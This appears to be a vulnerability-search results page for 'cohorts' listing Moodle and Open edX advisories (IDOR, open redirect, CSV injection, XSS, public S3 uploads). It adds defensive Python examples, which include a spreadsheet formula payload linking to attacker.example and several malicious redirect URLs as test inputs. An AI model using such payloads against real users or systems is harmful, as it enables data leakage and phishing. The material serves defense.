17 matches found
BIT-MOODLE-2025-3647 Moodle: IDOR when accessing the cohorts report
A flaw was discovered in Moodle. Additional checks were required to ensure that users can only access cohort data they are authorized to retrieve...
EUVD-2025-198952
Malicious code in @posthog/automatic-cohorts-plugin npm...
Malicious code in @posthog/automatic-cohorts-plugin (npm)
Per-source details. Source: amazon-inspector 6bf3963e4ab04b6b37d6cbb3f237a7b5577ddd854a7249a30f8b78dcc063af97: The package @posthog/automatic-cohorts-plugin was found to contain malicious code. Source: google-open-source-security...
Incorrect Authorization
Overview: moodle/moodle is a learning platform. Affected versions of this package are vulnerable to Incorrect Authorization via the cohorts report. An attacker can access unauthorized cohort data by exploiting insufficient access control checks. Remediation: Upgrade moodle/moodle to version 4.1.18,...
CVE-2024-41806
Open edX Platform's instructor CSV uploads for cohorts can be publicly accessible when using certain storage backends. The root cause is that uploads to AWS S3 buckets could be written with a public ACL in affected branches (master, palm, olive, nutmeg, maple, lilac, koa, juniper). A patch (commi...
CVE-2024-41806 Open edX Platform's instructor upload CSV for cohort creation not Private by Default
The Open edX Platform is a learning management platform. Instructors can upload csv files containing learner information to create cohorts in the instructor dashboard. These files are uploaded using the django default storage. With certain storage backends, uploads may become publicly available...
PT-2024-5257 · Amazon · Aws S3
Name of the Vulnerable Software and Affected Versions: Open edX Platform versions master, palm, olive, nutmeg, maple, lilac, koa, or juniper Description: The issue is related to inadequate access control in the Open edX Platform, specifically with the AWS S3 Bucket Handler component. This may all...
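The three CVE-2024-41806 entries above describe the same root cause: instructor CSV uploads written to S3 with a public ACL. The following check is an added example, not Open edX or django-storages code. It assumes the boto3 `get_object_acl` response shape (`Grants` -> `Grantee` -> `URI`) and the django-storages setting name `AWS_DEFAULT_ACL`; the S3 client is a constructed stub so the audit runs offline.

```python
"""Audit S3 object ACLs for world-readable grants (added example, not Open edX code).

Assumptions: boto3's get_object_acl() response layout, and the django-storages
setting AWS_DEFAULT_ACL for the weak/hardened configuration pair.
"""

# Group grantee URIs that make an object readable by everyone, or by any AWS account.
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

# Weak setting beside the corrected one (assumed django-storages setting names).
INSECURE_SETTINGS = {"AWS_DEFAULT_ACL": "public-read"}
HARDENED_SETTINGS = {"AWS_DEFAULT_ACL": "private", "AWS_QUERYSTRING_AUTH": True}


def public_grants(acl):
    """Return (grantee_uri, permission) pairs in an ACL that expose the object."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEE_URIS:
            found.append((grantee["URI"], grant.get("Permission", "")))
    return found


def audit_objects(client, bucket, keys):
    """Map each key to its public grants; an empty list means the object is private."""
    report = {}
    for key in keys:
        acl = client.get_object_acl(Bucket=bucket, Key=key)
        report[key] = public_grants(acl)
    return report


class _StubS3Client:
    """Constructed stand-in for a boto3 S3 client that returns canned ACLs."""

    _OWNER = {"ID": "owner-canonical-id"}
    _ACLS = {
        # Uploaded with a public-read default ACL: anyone can fetch learner data.
        "instructor/cohorts/upload.csv": {
            "Owner": _OWNER,
            "Grants": [
                {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
                 "Permission": "FULL_CONTROL"},
                {"Grantee": {"Type": "Group",
                             "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                 "Permission": "READ"},
            ],
        },
        # Uploaded after the fix: owner only.
        "instructor/cohorts/private.csv": {
            "Owner": _OWNER,
            "Grants": [
                {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
                 "Permission": "FULL_CONTROL"},
            ],
        },
    }

    def get_object_acl(self, Bucket, Key):
        return self._ACLS[Key]


if __name__ == "__main__":
    client = _StubS3Client()
    for key, grants in audit_objects(client, "edx-uploads", list(_StubS3Client._ACLS)).items():
        print(f"{key}: {'PUBLIC ' + str(grants) if grants else 'private'}")
```

Against a real bucket, swap the stub for `boto3.client("s3")` and pass the keys from a `list_objects_v2` pagination. Note that an object ACL is only one path to exposure: a bucket policy granting `s3:GetObject` to `*` would not show up here, so pair this with a bucket-policy review.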
Chrome starts the countdown to the end of tracking cookies
Google has announced that it will start rolling out its Chrome web browser's new Tracking Protection feature from January 2024. Tracking Protection is part of Google’s Privacy Sandbox initiative to phase out third-party cookies. The Tracking Protection feature aims to disable third-party cookies...
GHSA-5XP2-RV4H-MM2Q Moodle Open Redirect Vulnerability
A flaw was found in Moodle before 3.7, 3.6.4, 3.5.6, 3.4.9 and 3.1.18. The form to upload cohorts contained a redirect field, which was not restricted to internal URLs...
Google FLoC puts ad trackers on a cookie-free diet
Cookie tracking is dying and Google needs a replacement. It's betting on FLoC (Federated Learning of Cohorts), an ad tracking technology that lets it understand people's behaviour while respecting their privacy. Google has announced that its tests show promising signs that FLoC is working. Is this a milestone on the road to more...
CVE-2020-13146
Studio in Open edX Ironwood 2.5 allows CSV injection because an added cohort in Course > Instructor > Cohorts may contain a formula that is exported via the "Course > Data Downloads > Reports > Download profile info" feature...
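The entry above is a CSV (formula) injection: a cohort name beginning with `=`, `+`, `-` or `@` is copied verbatim into a downloadable report and evaluated by the spreadsheet that opens it. The following neutraliser is an added example, not Open edX code; the learner rows and the hostile cohort name are constructed sample data, and the trigger list and single-quote prefix follow the usual spreadsheet behaviour rather than any Open edX API.

```python
"""Neutralise spreadsheet formulas in exported CSV cells (added example, not Open edX code).

The rows below are constructed sample data; the cohort name on the second row is a
formula payload of the kind the cohort-creation form would accept.
"""
import csv
import io

# Leading characters that make spreadsheet applications evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value):
    """Prefix a cell that would be parsed as a formula with a single quote.

    Leading spaces are ignored when deciding, because spreadsheets ignore them
    too; a leading tab or carriage return is itself a trigger and is kept.
    """
    if not isinstance(value, str):
        return value
    if value.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_rows(rows, fieldnames):
    """Serialise rows to CSV text with every cell passed through neutralise_cell."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralise_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


def parse_rows(text):
    """Read CSV text back into dicts, so an export can be checked round-trip."""
    return list(csv.DictReader(io.StringIO(text)))


# Constructed sample: one learner whose cohort name is a formula payload.
SAMPLE_ROWS = [
    {"username": "alice", "email": "alice@example.org", "cohort": "Section A"},
    {"username": "mallory", "email": "mallory@example.org",
     "cohort": '=HYPERLINK("http://attacker.example/"&A2, "click")'},
    {"username": "bob", "email": "bob@example.org", "cohort": "  -2+3"},
]
FIELDS = ["username", "email", "cohort"]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS, FIELDS))
```

The `-` trigger also catches legitimate negative numbers, so apply the neutraliser to free-text columns (names, cohort labels) rather than numeric ones, or validate cohort names on input as well so the payload never reaches the report.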
CVE-2019-14879
A vulnerability was found in Moodle versions 3.7.x before 3.7.3, 3.6.x before 3.6.7 and 3.5.x before 3.5.9. When a cohort role assignment was removed, the associated capabilities were not being revoked where applicable...
CVE-2019-10133
A flaw was found in Moodle before 3.7, 3.6.4, 3.5.6, 3.4.9 and 3.1.18. The form to upload cohorts contained a redirect field, which was not restricted to internal URLs...
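The open-redirect entries above (GHSA-5XP2-RV4H-MM2Q / CVE-2019-10133) share one missing check: the cohort upload form's redirect field accepted any URL. The validator below is an added example, not Moodle code; `safe_redirect_target` is a hypothetical helper name, and the site root and candidate URLs are constructed.

```python
"""Restrict a user-supplied redirect target to the site itself (added example, not Moodle code).

`safe_redirect_target` is a hypothetical helper; `wwwroot` stands in for the
site's configured root URL.
"""
from urllib.parse import urlsplit


def safe_redirect_target(target, wwwroot, fallback="/"):
    """Return `target` if it stays on `wwwroot`'s scheme and host, else `fallback`.

    Accepted: site-absolute paths ("/cohort/index.php?...") and absolute URLs whose
    scheme and host exactly match the site root. Rejected: empty or control-character
    input, protocol-relative "//host", the backslash variant "/\\host" (browsers treat
    "\\" as "/"), foreign schemes such as javascript:, userinfo tricks ("site@evil"),
    and hosts that merely start with the site host.
    """
    if not target or any(ord(ch) <= 0x20 for ch in target):
        return fallback
    try:
        parts = urlsplit(target)
        site = urlsplit(wwwroot)
    except ValueError:
        return fallback

    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: must be a site-absolute path, not "//..." or "/\...".
        if target.startswith("/") and not target.startswith(("//", "/\\")):
            return target
        return fallback

    same_origin = (
        parts.scheme.lower() == site.scheme.lower()
        and parts.netloc.lower() == site.netloc.lower()
    )
    return target if same_origin else fallback


if __name__ == "__main__":
    root = "https://moodle.example.org"  # constructed site root
    for candidate in [
        "/cohort/index.php?contextid=1",
        "https://moodle.example.org/course/view.php?id=3",
        "//evil.example/phish",
        "/\\evil.example/phish",
        "https://moodle.example.org.evil.example/",
        "https://moodle.example.org@evil.example/",
        "javascript:alert(1)",
    ]:
        print(f"{candidate!r} -> {safe_redirect_target(candidate, root)!r}")
```

Exact host comparison is deliberate: allowing any subdomain or port would reopen the hole through a wildcard DNS entry or a second service on the same host. Paths without a leading slash are also refused rather than resolved, since resolution depends on the page issuing the redirect.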
Moodle Input Validation Error Vulnerability (CNVD-2019-35809)
Moodle is a free, open-source e-learning software platform, also known as a course management system, learning management system or virtual learning environment. An input validation error vulnerability exists in the upload cohorts page in Moodle, which stems from a network system or product that...
Cross-Site Scripting (XSS)
Moodle is susceptible to cross-site scripting (XSS) attacks. The attacks are possible because the idnumber field used in the administration of cohorts is not properly escaped. The flaw is due to an incorrect fix for CVE-2012-2365...